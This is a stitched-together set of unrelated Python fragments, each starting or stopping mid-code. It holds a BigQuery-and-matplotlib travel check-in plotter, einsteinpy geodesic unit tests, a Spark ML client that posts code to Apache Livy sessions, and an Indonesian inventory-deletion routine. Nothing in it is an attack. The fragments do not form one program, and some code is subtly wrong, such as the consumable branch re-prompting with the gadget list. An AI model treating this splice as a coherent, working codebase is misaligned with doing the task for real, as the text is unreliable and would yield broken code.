time_counter += 1
counter = weight
total_weight += weight
previous_venue = q['VENUE_ID']
previous_date = q['DATE']
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
f2.write(("user:" + u[1]) + ',')
f2.write(writing_information+"\n")
if (counter>0):
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
f3.write(("user:" + u[1]) + ',')
f3.write(writing_information+"\n")
f2.write("Sum Weight = " + str(total_weight) + ", Similarity = " + str("{0:.4f}".format(u[0])) + ", Number of correspond place = "+ str(time_counter) + "\n \n")
f3.write("Sum Weight = " + str(total_weight) + ", Similarity = " + str("{0:.4f}".format(u[0])) + "\n \n")
print("Sum Weight = " + str(total_weight))
# Output2へ書き込み:ここまで
lngs = [float(q['LONGITUDE']) for q in results]
lats = [float(q['LATITUDE']) for q in results]
# get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
#earth.drawcoastlines(color='#555566', linewidth=1)
# set japanese font
font = {'family' : 'IPAexGothic'}
# set Thai font
# font = {'family' : 'Tahoma'}
# 地図へ表示させる部分
# plt.plot(lngs, lats, '-o', label=u[1] , markersize=5)
axs[0].plot(lngs, lats, '-o', label=u[1] , markersize=5)
#place name in the map.
for q in results :
if q['VENUE_ID'] in location_name_dictionary:
location_name2 = location_name_dictionary[q['VENUE_ID']]
else:
location_name2 = q['VENUE_ID']
# axs[0].text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=7),**font)
# plt.text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=7),**font)
axs[0].set_title('Travel Records of Top Rankings Persons',**font)
# plt.title('Travel Records of Top Rankings Persons',**font)
# plt.title('Travel Records of people who prefer checkin-spots similar to Traveler ' + person)
plt.legend(loc=4)
#Travel Records by User.
# p2 = plt.subplot(1, 2, 2)
# to check that array is which in rankings.
ranking_number = -1
next_button = None
# axs[1] = plt.subplot(2, 2, 2 )
# axs[2] = plt.subplot(2, 2, 4 )
axs[2] = plt.subplot(1, 2, 2 )
axs[2].axis([0, 10, 0, 100])
#fuction for command button Next
def next_user(event) :
print("\nWating .....", end="")
nonlocal ranking_number
# axs[0].cla()
axs[2].cla()
axs[2].axis([0, 10, 0, 100])
ranking_number += 1
#check if list index out of range to set start rankings[0]
if(ranking_number == len(rankings)) :
ranking_number = 0
for u in rankings:
#check user, Which that
user = np.array(rankings[ranking_number])
if(u[1] == user[1]) :
# queryの実行
print("\nTravel record of User:" + u[1])
query = 'SELECT VENUE_ID, LATITUDE, LONGITUDE, COUNTRY, HOME, CATEGORY, DATE FROM dataset_TIST2015.Checkins_POIs_Travel_marked WHERE USER_ID = ' + u[1] + ' and TRAVEL = 1 and COUNTRY = \'' + country + '\''
#print(query)
try:
job_id, results = client.query(query, timeout=60)
except BigQueryTimeoutException as e:
print('Exception')
# 日付のフォーマットを変換
for q in results:
q['DATE'] = q['DATE'][4:]
Mon = q['DATE'][:3]
q['DATE'] = q['DATE'][4:]
if Mon == "Jan":
q['DATE'] = "01" + q['DATE']
if Mon == "Feb":
q['DATE'] = "02" + q['DATE']
if Mon == "Mar":
q['DATE'] = "03" + q['DATE']
if Mon == "Apr":
q['DATE'] = "04" + q['DATE']
if Mon == "May":
q['DATE'] = "05" + q['DATE']
if Mon == "Jun":
q['DATE'] = "06" + q['DATE']
if Mon == "Jul":
q['DATE'] = "07" + q['DATE']
if Mon == "Aug":
q['DATE'] = "08" + q['DATE']
if Mon == "Sep":
q['DATE'] = "09" + q['DATE']
if Mon == "Oct":
q['DATE'] = "10" + q['DATE']
if Mon == "Nov":
q['DATE'] = "11" + q['DATE']
if Mon == "Dec":
q['DATE'] = "12" + q['DATE']
YEAR = q['DATE'][len(q['DATE'])-4:len(q['DATE'])]
q['DATE'] = YEAR + q['DATE'][:len(q['DATE'])-4]
# 結果の表示
results.sort(key=lambda x: x['DATE'])
total_weight = 0
time_counter = 0
previous_venue = "" # Version21で追加
previous_date = "" # Version21で追加
# Output2へ書き込み:ここまで
lngs = [float(q['LONGITUDE']) for q in results]
lats = [float(q['LATITUDE']) for q in results]
# set japanese font
font = {'family' : 'IPAexGothic'}
# set Thai font
# font = {'family' : 'Tahoma'}
# 入力される Country Nameが JPの時だけ VENUE_NAMEで出力するように対応
location_name_dictionary = {}
if (country == "JP"):
location_name_dictionary = location_name = get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
location_name = ""
previous_venue = "0"
for q in results:
if q['VENUE_ID'] in location_name_dictionary:
location_name = location_name_dictionary[q['VENUE_ID']]
else:
location_name = q['VENUE_ID']
# 地図へ表示させる部分
axs[1].set_title('Travel Records of user '+ u[1],**font)
#C fllow number is mean Color in Tableau Colors
axs[1].plot(lngs, lats, '-o' 'C'+str(ranking_number) , markersize=6)
#place name in the map.
check_date = ""
check_category = ""
text_date = ""
text_time = ""
text_category = ""
text_plcename = ""
array_date =[]
array_time = []
array_category = []
array_location = []
set_y = 89
set_y_icon_h1 = 84.4
set_y_icon_h2 = 88.1
long_text = ""
for q in results :
if q['VENUE_ID'] in location_name_dictionary:
location_name2 = location_name_dictionary[q['VENUE_ID']]
else:
location_name2 = q['VENUE_ID']
axs[1].text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=10),**font)
check_date = q['DATE']
array_date.append(check_date.split(" ")[0])
array_time.append(check_date.split(" ")[1])
array_category.append(q['CATEGORY'])
array_location.append(location_name2)
text_date = check_date.split(" ")[0]
text_time = check_date.split(" ")[1]
check_category = q['CATEGORY']
text_category = q['CATEGORY']
text_plcename = location_name2
url = "https://matplotlib.org/"
#text of travel record by set y axis of graph
axs[2].text(1,set_y, "Date : " + text_date , size =8 , **font) #set_y = 89 , 81.95 , 74.9 , ...
set_y -= 2.25
axs[2].text(1,set_y, " " + text_plcename , size =8 , **font ) #set_y = 86.75 , 79.7 , 72.65 , ...
set_y -= 2.35
axs[2].text(1,set_y, " | |
import warnings
import astropy.units as u
import numpy as np
import pytest
from numpy.testing import assert_allclose
from einsteinpy.metric import Schwarzschild, Kerr, KerrNewman
from einsteinpy.coordinates import CartesianConversion
from einsteinpy.coordinates.utils import four_position, stacked_vec
from einsteinpy.geodesic import Geodesic
from einsteinpy import constant
_c = constant.c.value
_G = constant.G.value
_Cc = constant.coulombs_const.value
def test_str_repr():
"""
Tests, if the ``__str__`` and ``__repr__`` messages match
"""
t = 0.
M = 1e25
x_vec = np.array([306., np.pi / 2, np.pi / 2])
v_vec = np.array([0., 0.01, 10.])
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 1.
step_size = 0.4e-6
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size
)
assert str(geod) == repr(geod)
@pytest.fixture()
def dummy_data():
M = 6e24
t = 0.
x_vec = np.array([130.0, np.pi / 2, -np.pi / 8])
v_vec = np.array([0.0, 0.0, 1900.0])
metric = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
metric_mat = metric.metric_covariant(x_4vec)
init_vec = stacked_vec(metric_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 0.002
step_size = 5e-8
return metric, init_vec, end_lambda, step_size
def test_Geodesics_has_trajectory(dummy_data):
metric, init_vec, end_lambda, step_size = dummy_data
geo = Geodesic(
metric=metric,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size
)
assert isinstance(geo.trajectory, np.ndarray)
@pytest.mark.parametrize(
"x_vec, v_vec, t, M, end_lambda, step_size",
[
(
np.array([306., np.pi / 2, np.pi / 2]),
np.array([0., 0., 951.]),
0.,
4e24,
0.002,
0.5e-6,
),
(
np.array([1e3, 0.15, np.pi / 2]),
np.array([0.1 * _c, 0.5e-5 * _c, 0.5e-4 * _c]),
0.,
5.972e24,
0.0001,
0.5e-6,
),
(
np.array([50e3, np.pi / 2, np.pi / 2]),
np.array([0.1 * _c, 2e-7 * _c, 1e-5]),
0.,
5.972e24,
0.001,
5e-6,
),
],
)
def test_calculate_trajectory_schwarzschild(
x_vec, v_vec, t, M, end_lambda, step_size
):
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size,
return_cartesian=False
)
ans = geod.trajectory
testarray = list()
for i in ans:
x = i[:4]
g = ms_cov.metric_covariant(x)
testarray.append(
g[0][0] * (i[4] ** 2) +
g[1][1] * (i[5] ** 2) +
g[2][2] * (i[6] ** 2) +
g[3][3] * (i[7] ** 2)
)
testarray = np.array(testarray, dtype=float)
assert_allclose(testarray, 1., 1e-4)
def test_calculate_trajectory2_schwarzschild():
# based on the revolution of earth around sun
# data from https://en.wikipedia.org/wiki/Earth%27s_orbit
t = 0.
M = 1.989e30
distance_at_perihelion = 147.10e9
speed_at_perihelion = 30290
angular_vel = (speed_at_perihelion / distance_at_perihelion)
x_vec = np.array([distance_at_perihelion, np.pi / 2, 0])
v_vec = np.array([0.0, 0.0, angular_vel])
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 3.154e7
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=end_lambda / 2e3,
return_cartesian=False
)
ans = geod.trajectory
# velocity should be 29.29 km/s at aphelion(where r is max)
i = np.argmax(ans[:, 1]) # index where radial distance is max
v_aphelion = (((ans[i][1] * ans[i][7]) * (u.m / u.s)).to(u.km / u.s)).value
assert_allclose(v_aphelion, 29.29, rtol=0.01)
def test_calculate_trajectory3_schwarzschild():
# same test as with test_calculate_trajectory2_schwarzschild(),
# but initialized with cartesian coordinates
# and function returning cartesian coordinates
t = 0.
M = 1.989e30
distance_at_perihelion = 147.10e9
speed_at_perihelion = 30290
x_sph = CartesianConversion(
distance_at_perihelion / np.sqrt(2),
distance_at_perihelion / np.sqrt(2),
0.,
-speed_at_perihelion / np.sqrt(2),
speed_at_perihelion / np.sqrt(2),
0.
).convert_spherical()
x_vec = x_sph[:3]
v_vec = x_sph[3:]
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 3.154e7
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=end_lambda / 2e3,
)
ans = geod.trajectory
# velocity should be 29.29 km/s at aphelion(where r is max)
R = np.sqrt(ans[:, 1] ** 2 + ans[:, 2] ** 2 + ans[:, 3] ** 2)
i = np.argmax(R) # index where radial distance is max
v_aphelion = (
(np.sqrt(ans[i, 5] ** 2 + ans[i, 6] ** 2 + ans[i, 7] ** 2) * (u.m / u.s)).to(
u.km / u.s
)
).value
assert_allclose(v_aphelion, 29.29, rtol=0.01)
@pytest.mark.parametrize(
"x_vec, v_vec, t, M, end_lambda, step_size, OdeMethodKwargs, return_cartesian",
[
(
np.array([306., np.pi / 2, np.pi / 2]),
np.array([0., 0.1, 951.]),
0.,
4e24,
0.0002,
0.3e-6,
{"stepsize": 0.3e-6},
True,
),
(
np.array([1e3, 0.15, np.pi / 2]),
np.array([_c, 0.5e-5 * _c, 1e-4 * _c]),
0.,
5.972e24,
0.0002,
0.5e-6,
{"stepsize": 0.5e-6},
False,
),
],
)
def test_calculate_trajectory_iterator_schwarzschild(
x_vec, v_vec, t, M, end_lambda, step_size, OdeMethodKwargs, return_cartesian
):
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size,
return_cartesian=return_cartesian
)
traj = geod.trajectory
traj_iter = geod.calculate_trajectory_iterator(OdeMethodKwargs=OdeMethodKwargs, return_cartesian=return_cartesian)
traj_iter_list = list()
for _, val in zip(range(50), traj_iter):
traj_iter_list.append(val[1])
traj_iter_arr = np.array(traj_iter_list)
assert_allclose(traj[:50, :], traj_iter_arr, rtol=1e-10)
def test_calculate_trajectory_iterator_RuntimeWarning_schwarzschild():
t = 0.
M = 1e25
x_vec = np.array([306., np.pi / 2, np.pi / 2])
v_vec = np.array([0., 0.01, 10.])
ms_cov = Schwarzschild(M=M)
x_4vec = four_position(t, x_vec)
ms_cov_mat = ms_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(ms_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 1.
stepsize = 0.4e-6
OdeMethodKwargs = {"stepsize": stepsize}
geod = Geodesic(
metric=ms_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=stepsize,
return_cartesian=False
)
with warnings.catch_warnings(record=True) as w:
it = geod.calculate_trajectory_iterator(
OdeMethodKwargs=OdeMethodKwargs,
)
for _, _ in zip(range(1000), it):
pass
assert len(w) >= 1
@pytest.mark.parametrize(
"x_vec, v_vec, t, M, a, end_lambda, step_size",
[
(
np.array([306., np.pi / 2.05, np.pi / 2]),
np.array([0., 0., 951.]),
0.,
4e24,
2e-3,
0.001,
0.5e-6,
),
(
np.array([1e3, 0.15, np.pi / 2]),
np.array([0.1 * _c, 0.5e-5 * _c, 0.5e-4 * _c]),
0.,
5.972e24,
2e-3,
0.0001,
0.5e-6,
),
(
np.array([50e3, np.pi / 2, np.pi / 2]),
np.array([0.1 * _c, 2e-7 * _c, 1e-5]),
0.,
5.972e24,
0.,
0.001,
5e-6,
),
],
)
def test_calculate_trajectory_kerr(
x_vec, v_vec, t, M, a, end_lambda, step_size
):
mk_cov = Kerr(coords="BL", M=M, a=a)
x_4vec = four_position(t, x_vec)
mk_cov_mat = mk_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(mk_cov_mat, t, x_vec, v_vec, time_like=True)
geod = Geodesic(
metric=mk_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size,
return_cartesian=False
)
ans = geod.trajectory
testarray = list()
for i in ans:
x = i[:4]
g = mk_cov.metric_covariant(x)
testarray.append(
g[0][0] * (i[4] ** 2) +
g[1][1] * (i[5] ** 2) +
g[2][2] * (i[6] ** 2) +
g[3][3] * (i[7] ** 2) +
2 * g[0][3] * i[4] * i[7]
)
testarray = np.array(testarray, dtype=float)
assert_allclose(testarray, 1., 1e-4)
def test_calculate_trajectory3_kerr():
# Based on the revolution of earth around sun
# Data from https://en.wikipedia.org/wiki/Earth%27s_orbit
# Initialized with cartesian coordinates
# Function returning cartesian coordinates
t = 0.
M = 1.989e30
a = 0.
distance_at_perihelion = 147.10e9
speed_at_perihelion = 30290
x_sph = CartesianConversion(
distance_at_perihelion / np.sqrt(2),
distance_at_perihelion / np.sqrt(2),
0.,
-speed_at_perihelion / np.sqrt(2),
speed_at_perihelion / np.sqrt(2),
0.
).convert_spherical()
x_vec = x_sph[:3]
v_vec = x_sph[3:]
mk_cov = Kerr(coords="BL", M=M, a=a)
x_4vec = four_position(t, x_vec)
mk_cov_mat = mk_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(mk_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 3.154e7
geod = Geodesic(
metric=mk_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=end_lambda / 2e3,
)
ans = geod.trajectory
# velocity should be 29.29 km/s at aphelion(where r is max)
R = np.sqrt(ans[:, 1] ** 2 + ans[:, 2] ** 2 + ans[:, 3] ** 2)
i = np.argmax(R) # index where radial distance is max
v_aphelion = (
(np.sqrt(ans[i, 5] ** 2 + ans[i, 6] ** 2 + ans[i, 7] ** 2) * (u.m / u.s)).to(
u.km / u.s
)
).value
assert_allclose(v_aphelion, 29.29, rtol=0.01)
@pytest.mark.parametrize(
"x_vec, v_vec, t, M, a, end_lambda, step_size, OdeMethodKwargs, return_cartesian",
[
(
np.array([306., np.pi / 2, np.pi / 2]),
np.array([0., 0.1, 951.]),
0.,
4e24,
2e-3,
0.0003,
0.3e-6,
{"stepsize": 0.3e-6},
True,
),
(
np.array([1e3, 0.15, np.pi / 2]),
np.array([0.2 * _c, 0.5e-5 * _c, 1e-4 * _c]),
0.,
5.972e24,
0.,
0.0004,
0.5e-6,
{"stepsize": 0.5e-6},
False,
),
],
)
def test_calculate_trajectory_iterator_kerr(
x_vec, v_vec, t, M, a, end_lambda, step_size, OdeMethodKwargs, return_cartesian
):
mk_cov = Kerr(coords="BL", M=M, a=a)
x_4vec = four_position(t, x_vec)
mk_cov_mat = mk_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(mk_cov_mat, t, x_vec, v_vec, time_like=True)
geod = Geodesic(
metric=mk_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=step_size,
return_cartesian=return_cartesian
)
traj = geod.trajectory
traj_iter = geod.calculate_trajectory_iterator(OdeMethodKwargs=OdeMethodKwargs, return_cartesian=return_cartesian)
traj_iter_list = list()
for _, val in zip(range(50), traj_iter):
traj_iter_list.append(val[1])
traj_iter_arr = np.array(traj_iter_list)
assert_allclose(traj[:50, :], traj_iter_arr, rtol=1e-10)
def test_calculate_trajectory_iterator_RuntimeWarning_kerr():
t = 0.
M = 1e25
a = 0.
x_vec = np.array([306., np.pi / 2, np.pi / 2])
v_vec = np.array([0., 0.01, 10.])
mk_cov = Kerr(coords="BL", M=M, a=a)
x_4vec = four_position(t, x_vec)
mk_cov_mat = mk_cov.metric_covariant(x_4vec)
init_vec = stacked_vec(mk_cov_mat, t, x_vec, v_vec, time_like=True)
end_lambda = 1.
stepsize = 0.4e-6
OdeMethodKwargs = {"stepsize": stepsize}
geod = Geodesic(
metric=mk_cov,
init_vec=init_vec,
end_lambda=end_lambda,
step_size=stepsize,
return_cartesian=False
)
with warnings.catch_warnings(record=True) as w:
it = geod.calculate_trajectory_iterator(
OdeMethodKwargs=OdeMethodKwargs,
)
for | |
train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-10'
self.ret_message['description'] = r.text
return self.ret_message
def decision_tree(self,
table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
seed, train, test,
user_id, livy_id):
t = Template()
code = t.decision_tree(table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
seed, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def naive_bayes(self,
table_name,
features_col,
label_col,
prediction_col,
thresholds,
probability_col,
raw_prediction_col,
smoothing,
weight_col,
model_type,
train, test,
user_id, livy_id):
t = Template()
code = t.naive_bayes(table_name, features_col, label_col, prediction_col, thresholds, probability_col, raw_prediction_col, smoothing, weight_col, model_type, train, test,)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-10'
self.ret_message['description'] = r.text
return self.ret_message
def random_forest(self,
table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
num_trees,
feature_subset_strategy,
seed,
subsampling_rate,
train,test,
user_id, livy_id):
t = Template()
code = t.random_forest(table_name,
features_col,
label_col,
prediction_col,
probability_col,
raw_prediction_col,
max_depth,
max_bins,
min_instances_per_node,
min_info_gain,
max_memory_in_mb,
cache_node_ids,
checkpoint_interval,
impurity,
num_trees,
feature_subset_strategy,
seed,
subsampling_rate, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def fp_growth(self, table_name, splits, min_support, min_confidence, items_col, prediction_col, num_partitions, user_id, livy_id):
t = Template()
code = t.fp_growth(table_name, splits, min_support, min_confidence, items_col, prediction_col, num_partitions)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def linear_svc(self, table_name, features_col, label_col, prediction_col, max_iter, reg_param, tol, raw_prediction_col, fit_intercept, standardization, threshold, weight_col, aggregation_depth, train, test, user_id, livy_id):
t = Template()
code = t.linear_svc(table_name, features_col, label_col, prediction_col, max_iter, reg_param, tol, raw_prediction_col, fit_intercept, standardization, threshold, weight_col, aggregation_depth, train, test)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def arima(self, table_name, splits, numberofpredict, date_col, timeseries_col, start_p, d, start_q, max_p, max_d, max_q, start_P, D, start_Q, max_P, max_D, max_Q, max_order, m, seasonal, stationary, stepwise, solver, suppress_warnings, error_action, trace, scoring, business, by, user_id, livy_id):
t = Template()
code = t.arima(table_name, splits, numberofpredict, date_col, timeseries_col, start_p, d, start_q, max_p, max_d, max_q, start_P, D, start_Q, max_P, max_D, max_Q, max_order, m, seasonal, stationary, stepwise, solver, suppress_warnings, error_action, trace, scoring, business, by)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def get_pipeline_stages(self, user_id, livy_id):
t = Template()
code = t.get_pipeline_stages()
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
def save_model(self, session_name, file_name, stages, dataframe, user_id, livy_id):
t = Template()
code = t.save_model(session_name, file_name, stages, dataframe)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-11'
self.ret_message['description'] = r.text
return self.ret_message
# def line_chart_visual(self, table_name, x, y, user_id, livy_id):
# t = Template()
# code = t.line_chart_visual(table_name, x, y)
# statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
# headers = {'Content-Type': 'application/json'}
# data = {"code": code}
# r = requests.post(statement_url, data=json.dumps(data), headers=headers)
# if str(r.status_code) == '201' or str(r.status_code) == '200':
# self.ret_message['code'] = self.ret_message['code']
# else:
# self.ret_message['code'] = 'livy-12'
# self.ret_message['description'] = r.text
# return self.ret_message
def line_chart_visual(self, table_name, x, y, user_id, livy_id):
t = Template()
code = t.line_chart_visual(table_name, x, y)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def bar_chart_visual(self, table_name, index, columns, agg, user_id, livy_id):
t = Template()
code = t.bar_chart_visual(table_name, index, columns, agg)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def pie_chart_visual(self, table_name, agg, values, user_id, livy_id):
t = Template()
code = t.pie_chart_visual(table_name, agg, values)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def histogram_chart_visual(self, table_name, x1, x2, user_id, livy_id):
t = Template()
code = t.histogram_chart_visual(table_name, x1, x2)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def violin_chart_visual(self, table_name, x, y, z, user_id, livy_id):
t = Template()
code = t.violin_chart_visual(table_name, x, y, z)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def scatter_chart_visual(self, table_name, x, y, z, category, user_id, livy_id):
t = Template()
code = t.scatter_chart_visual(table_name, x, y, z, category)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text
return self.ret_message
def decision_tree_visual(self, filled, roundedCorners, roundLeaves, user_id, livy_id):
t = Template()
code = t.decision_tree_visual(filled, roundedCorners, roundLeaves)
statement_url = self.host + '/sessions' + '/' + str(livy_id) + '/statements'
headers = {'Content-Type': 'application/json'}
data = {"code": code}
r = requests.post(statement_url, data=json.dumps(data), headers=headers)
if str(r.status_code) == '201' or str(r.status_code) == '200':
self.ret_message['code'] = self.ret_message['code']
else:
self.ret_message['code'] = 'livy-12'
self.ret_message['description'] = r.text | |
= input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
# Validasi jawaban
while not validasiYN(jawaban):
jawaban = input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
if jawaban == 'Y':
gadget.pop(urutan)
print()
print("Item telah berhasil dihapus dari database.")
else:
print("Item tidak jadi dihapus dari database")
rolling = False
else:
print("Tidak ada item dengan ID tersebut.")
elif ID[0] == 'C':
if IDItemAda(consumable,ID):
urutan = cariID(consumable,ID)
jawaban = input("Apakah anda yakin ingin menghapus " + consumable[urutan][1] + " (Y/N)? ")
# Validasi jawaban
while not validasiYN(jawaban):
jawaban = input("Apakah anda yakin ingin menghapus " + gadget[urutan][1] + " (Y/N)? ")
if jawaban == 'Y':
consumable.pop(urutan)
print()
print("Item telah berhasil dihapus dari database.")
else:
print("Item tidak jadi dihapus dari database")
rolling = False
else:
print("Tidak ada item dengan ID tersebut.")
else:
print("ID yang anda masukkan invalid, ID harus diawali dengan huruf C atau G")
# rolling == False
# ============================ F7 ========================================
def ubahjumlah():
# Mengubah jumlah gadget dan consumable yang ada pada database
# I.S. matriks data gadget dan consumable terdefinisi
# F.S. jumlah item pada database berubah
# KAMUS LOKAL
# id_item : string
# before, change, indeks_found: integer
# isInteger, found : boolean
# ALGORITMA
id_item = input("Masukan ID: ")
# Validasi jumlah
